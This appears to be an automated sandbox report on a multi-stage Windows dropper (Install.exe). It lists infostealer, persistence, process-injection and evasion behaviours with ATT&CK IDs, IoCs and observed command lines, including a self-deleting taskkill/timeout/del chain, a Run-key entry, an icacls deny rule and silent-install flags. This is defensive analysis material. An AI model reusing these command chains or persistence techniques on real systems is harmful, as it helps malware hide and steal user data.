djvu | ef1c7df22e071bd236cff6de972f281c9db53e4f247be4cfd341777c03277108

System Information Discovery

Processes:

Install.exeurnbMH0oDvkrvbrpwkSgNldb.exeJ944jgl51CX33DHRnoas0zh1.exeInstall.exeSETUP_~1.EXEZWuWYy0htiErP6uyYmeg_lrh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	urnbMH0oDvkrvbrpwkSgNldb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	J944jgl51CX33DHRnoas0zh1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	SETUP_~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	ZWuWYy0htiErP6uyYmeg_lrh.exe

Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

3544 rundll32.exe
48304 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

30260 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3544	rundll32.exe
48304	rundll32.exe

pid	process
30260	icacls.exe

Unexpected DNS network traffic destination 7 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9
Destination IP	9.9.9.9

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

xqKmRxyI9yMan9smqcBne3I2.exedMx8nhhpXavZ4uPJ5zOMtF7f.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	xqKmRxyI9yMan9smqcBne3I2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	xqKmRxyI9yMan9smqcBne3I2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\164adf43-3388-47f0-8c7f-57eba9c2a483\\dMx8nhhpXavZ4uPJ5zOMtF7f.exe\" --AutoStart"	dMx8nhhpXavZ4uPJ5zOMtF7f.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

310 api.2ip.ua
311 api.2ip.ua
131 ipinfo.io
226 api.2ip.ua
267 api.2ip.ua
107 ipinfo.io
108 api.2ip.ua
109 api.2ip.ua
21 ipinfo.io
22 ipinfo.io
106 ipinfo.io

flow	ioc
310	api.2ip.ua
311	api.2ip.ua
131	ipinfo.io
226	api.2ip.ua
267	api.2ip.ua
107	ipinfo.io
108	api.2ip.ua
109	api.2ip.ua
21	ipinfo.io
22	ipinfo.io
106	ipinfo.io

Drops file in System32 directory 5 IoCs

Processes:

Install.exeInstall.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	Install.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

dMx8nhhpXavZ4uPJ5zOMtF7f.exelFyZ92vXmfbnHdGnC1PY_RhC.exe

description	pid	process	target process
PID 1596 set thread context of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 2436 set thread context of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe

Drops file in Program Files directory 2 IoCs

Processes:

J944jgl51CX33DHRnoas0zh1.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	J944jgl51CX33DHRnoas0zh1.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	J944jgl51CX33DHRnoas0zh1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2724	2832	WerFault.exe	vUAFUhj9jvoWazidiFp5wtjX.exe
4080	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
30780	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
31184	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
31424	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
33348	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
33596	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
48004	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
2872	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
1088	48628	WerFault.exe	E2wjsC5vzAhP_HKqoOZze8Cw.exe
49068	48972	WerFault.exe	bpkZIh67SfrjIoXdygIq2sUj.exe
48364	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
49680	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
48804	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
31592	48904	WerFault.exe	rundll32.exe
50156	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
48684	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
49752	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
50576	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
50592	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
48724	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe
72364	4472	WerFault.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
103008	48524	WerFault.exe	E2wmNUePF6O32h75mC_Ck9Zw.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

gWG8uPeowFtgqwbOzyuVCCwk.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gWG8uPeowFtgqwbOzyuVCCwk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gWG8uPeowFtgqwbOzyuVCCwk.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gWG8uPeowFtgqwbOzyuVCCwk.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
48600	schtasks.exe
72548	schtasks.exe
4416	schtasks.exe
4900	schtasks.exe
2096	schtasks.exe
33668	schtasks.exe
48300	schtasks.exe
4140	schtasks.exe
50556	schtasks.exe
53556	schtasks.exe
3476	schtasks.exe
30740	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

33388 timeout.exe
3588 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

55964 tasklist.exe
72492 tasklist.exe

pid	process
33388	timeout.exe
3588	timeout.exe

pid	process
55964	tasklist.exe
72492	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

51988 taskkill.exe
103272 taskkill.exe
49792 taskkill.exe

pid	process
51988	taskkill.exe
103272	taskkill.exe
49792	taskkill.exe

Modifies registry class 2 IoCs

Processes:

Install.exeurnbMH0oDvkrvbrpwkSgNldb.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Install.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	urnbMH0oDvkrvbrpwkSgNldb.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

50728 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

75212 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 231 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
50728	reg.exe

pid	process
75212	PING.EXE

description	flow	ioc
HTTP User-Agent header	231	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Install.exegWG8uPeowFtgqwbOzyuVCCwk.exedMx8nhhpXavZ4uPJ5zOMtF7f.exeZWuWYy0htiErP6uyYmeg_lrh.exe

pid	process
1076	Install.exe
1076	Install.exe
1640	gWG8uPeowFtgqwbOzyuVCCwk.exe
1640	gWG8uPeowFtgqwbOzyuVCCwk.exe
1464	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
1464	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
1124
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
30396	ZWuWYy0htiErP6uyYmeg_lrh.exe
1124
1124
1124
1124

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1124
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

gWG8uPeowFtgqwbOzyuVCCwk.exe

pid process

1640 gWG8uPeowFtgqwbOzyuVCCwk.exe

pid	process
1124

pid	process
1640	gWG8uPeowFtgqwbOzyuVCCwk.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

SETUP_~1.EXEpowershell.exelFyZ92vXmfbnHdGnC1PY_RhC.exe

description	pid	process
Token: SeDebugPrivilege	1016	SETUP_~1.EXE
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeDebugPrivilege	31652	powershell.exe
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeShutdownPrivilege	1124
Token: SeCreatePagefilePrivilege	1124
Token: SeDebugPrivilege	504	lFyZ92vXmfbnHdGnC1PY_RhC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Install.exeurnbMH0oDvkrvbrpwkSgNldb.exep0AC6yBn3ASw6LWWgTDhKQqw.exedMx8nhhpXavZ4uPJ5zOMtF7f.exeInstall.execontrol.exelFyZ92vXmfbnHdGnC1PY_RhC.exexqKmRxyI9yMan9smqcBne3I2.exe

description	pid	process	target process
PID 1076 wrote to memory of 4304	1076	Install.exe	p0AC6yBn3ASw6LWWgTDhKQqw.exe
PID 1076 wrote to memory of 4304	1076	Install.exe	p0AC6yBn3ASw6LWWgTDhKQqw.exe
PID 1076 wrote to memory of 4304	1076	Install.exe	p0AC6yBn3ASw6LWWgTDhKQqw.exe
PID 1076 wrote to memory of 4472	1076	Install.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
PID 1076 wrote to memory of 4472	1076	Install.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
PID 1076 wrote to memory of 4472	1076	Install.exe	GkkW3wKWJfoKEXtbVraCoY_5.exe
PID 1076 wrote to memory of 3504	1076	Install.exe	J944jgl51CX33DHRnoas0zh1.exe
PID 1076 wrote to memory of 3504	1076	Install.exe	J944jgl51CX33DHRnoas0zh1.exe
PID 1076 wrote to memory of 3504	1076	Install.exe	J944jgl51CX33DHRnoas0zh1.exe
PID 1076 wrote to memory of 1640	1076	Install.exe	gWG8uPeowFtgqwbOzyuVCCwk.exe
PID 1076 wrote to memory of 1640	1076	Install.exe	gWG8uPeowFtgqwbOzyuVCCwk.exe
PID 1076 wrote to memory of 1640	1076	Install.exe	gWG8uPeowFtgqwbOzyuVCCwk.exe
PID 1076 wrote to memory of 3940	1076	Install.exe	urnbMH0oDvkrvbrpwkSgNldb.exe
PID 1076 wrote to memory of 3940	1076	Install.exe	urnbMH0oDvkrvbrpwkSgNldb.exe
PID 1076 wrote to memory of 3940	1076	Install.exe	urnbMH0oDvkrvbrpwkSgNldb.exe
PID 1076 wrote to memory of 1596	1076	Install.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1076 wrote to memory of 1596	1076	Install.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1076 wrote to memory of 1596	1076	Install.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1076 wrote to memory of 2832	1076	Install.exe	vUAFUhj9jvoWazidiFp5wtjX.exe
PID 1076 wrote to memory of 2832	1076	Install.exe	vUAFUhj9jvoWazidiFp5wtjX.exe
PID 1076 wrote to memory of 2436	1076	Install.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 1076 wrote to memory of 2436	1076	Install.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 1076 wrote to memory of 2436	1076	Install.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 1076 wrote to memory of 4988	1076	Install.exe	89H2U6T799E_xQqJCTJUsYKn.exe
PID 1076 wrote to memory of 4988	1076	Install.exe	89H2U6T799E_xQqJCTJUsYKn.exe
PID 1076 wrote to memory of 4988	1076	Install.exe	89H2U6T799E_xQqJCTJUsYKn.exe
PID 1076 wrote to memory of 2928	1076	Install.exe	xLmGFtewVGx31R1dEvJapWTf.exe
PID 1076 wrote to memory of 2928	1076	Install.exe	xLmGFtewVGx31R1dEvJapWTf.exe
PID 1076 wrote to memory of 2928	1076	Install.exe	xLmGFtewVGx31R1dEvJapWTf.exe
PID 1076 wrote to memory of 1984	1076	Install.exe	xqKmRxyI9yMan9smqcBne3I2.exe
PID 1076 wrote to memory of 1984	1076	Install.exe	xqKmRxyI9yMan9smqcBne3I2.exe
PID 3940 wrote to memory of 3796	3940	urnbMH0oDvkrvbrpwkSgNldb.exe	control.exe
PID 3940 wrote to memory of 3796	3940	urnbMH0oDvkrvbrpwkSgNldb.exe	control.exe
PID 3940 wrote to memory of 3796	3940	urnbMH0oDvkrvbrpwkSgNldb.exe	control.exe
PID 4304 wrote to memory of 1440	4304	p0AC6yBn3ASw6LWWgTDhKQqw.exe	Install.exe
PID 4304 wrote to memory of 1440	4304	p0AC6yBn3ASw6LWWgTDhKQqw.exe	Install.exe
PID 4304 wrote to memory of 1440	4304	p0AC6yBn3ASw6LWWgTDhKQqw.exe	Install.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1440 wrote to memory of 4236	1440	Install.exe	Install.exe
PID 1440 wrote to memory of 4236	1440	Install.exe	Install.exe
PID 1440 wrote to memory of 4236	1440	Install.exe	Install.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 1596 wrote to memory of 1464	1596	dMx8nhhpXavZ4uPJ5zOMtF7f.exe	dMx8nhhpXavZ4uPJ5zOMtF7f.exe
PID 3796 wrote to memory of 3544	3796	control.exe	rundll32.exe
PID 3796 wrote to memory of 3544	3796	control.exe	rundll32.exe
PID 3796 wrote to memory of 3544	3796	control.exe	rundll32.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 1984 wrote to memory of 1016	1984	xqKmRxyI9yMan9smqcBne3I2.exe	SETUP_~1.EXE
PID 1984 wrote to memory of 1016	1984	xqKmRxyI9yMan9smqcBne3I2.exe	SETUP_~1.EXE
PID 1984 wrote to memory of 1016	1984	xqKmRxyI9yMan9smqcBne3I2.exe	SETUP_~1.EXE
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe
PID 2436 wrote to memory of 504	2436	lFyZ92vXmfbnHdGnC1PY_RhC.exe	lFyZ92vXmfbnHdGnC1PY_RhC.exe

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1076

C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exe
"C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exe"
2⤵
- Executes dropped EXE
PID:2832

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2832 -s 476
3⤵
- Program crash
PID:2724

C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe
"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1596

C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe
"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:1464

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\164adf43-3388-47f0-8c7f-57eba9c2a483" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:30260

C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe
"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:984

C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe
"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:4756

C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe
"C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe"
6⤵
PID:31260

C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe
"C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe"
7⤵
PID:51192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe" & del C:\PrograData\*.dll & exit
8⤵
PID:51780

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
9⤵
- Kills process with taskkill
PID:51988

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Delays execution with timeout.exe
PID:33388

C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build3.exe
"C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build3.exe"
6⤵
PID:49048

C:\Users\Admin\Pictures\Minor Policy\urnbMH0oDvkrvbrpwkSgNldb.exe
"C:\Users\Admin\Pictures\Minor Policy\urnbMH0oDvkrvbrpwkSgNldb.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3940

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",
4⤵
- Loads dropped DLL
PID:3544

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",
5⤵
PID:48256

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",
6⤵
- Loads dropped DLL
PID:48304

C:\Users\Admin\Pictures\Minor Policy\gWG8uPeowFtgqwbOzyuVCCwk.exe
"C:\Users\Admin\Pictures\Minor Policy\gWG8uPeowFtgqwbOzyuVCCwk.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1640

C:\Users\Admin\Pictures\Minor Policy\J944jgl51CX33DHRnoas0zh1.exe
"C:\Users\Admin\Pictures\Minor Policy\J944jgl51CX33DHRnoas0zh1.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:3504

C:\Users\Admin\Documents\ZWuWYy0htiErP6uyYmeg_lrh.exe
"C:\Users\Admin\Documents\ZWuWYy0htiErP6uyYmeg_lrh.exe"
3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:30396

C:\Users\Admin\Pictures\Adobe Films\bLEtFTHBvIMC_0CNOqyvtfQv.exe
"C:\Users\Admin\Pictures\Adobe Films\bLEtFTHBvIMC_0CNOqyvtfQv.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
4⤵
- Executes dropped EXE
PID:48488

C:\Users\Admin\AppData\Local\Temp\is-4K5U4.tmp\bLEtFTHBvIMC_0CNOqyvtfQv.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4K5U4.tmp\bLEtFTHBvIMC_0CNOqyvtfQv.tmp" /SL5="$20236,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\bLEtFTHBvIMC_0CNOqyvtfQv.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
5⤵
PID:48124

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
6⤵
- Kills process with taskkill
PID:49792

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
6⤵
PID:48300

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
7⤵
PID:50308

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=e32e1c791664575903 --downloadDate=2022-09-30T22:10:44 --distId=marketator --pid=747
6⤵
PID:3408

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
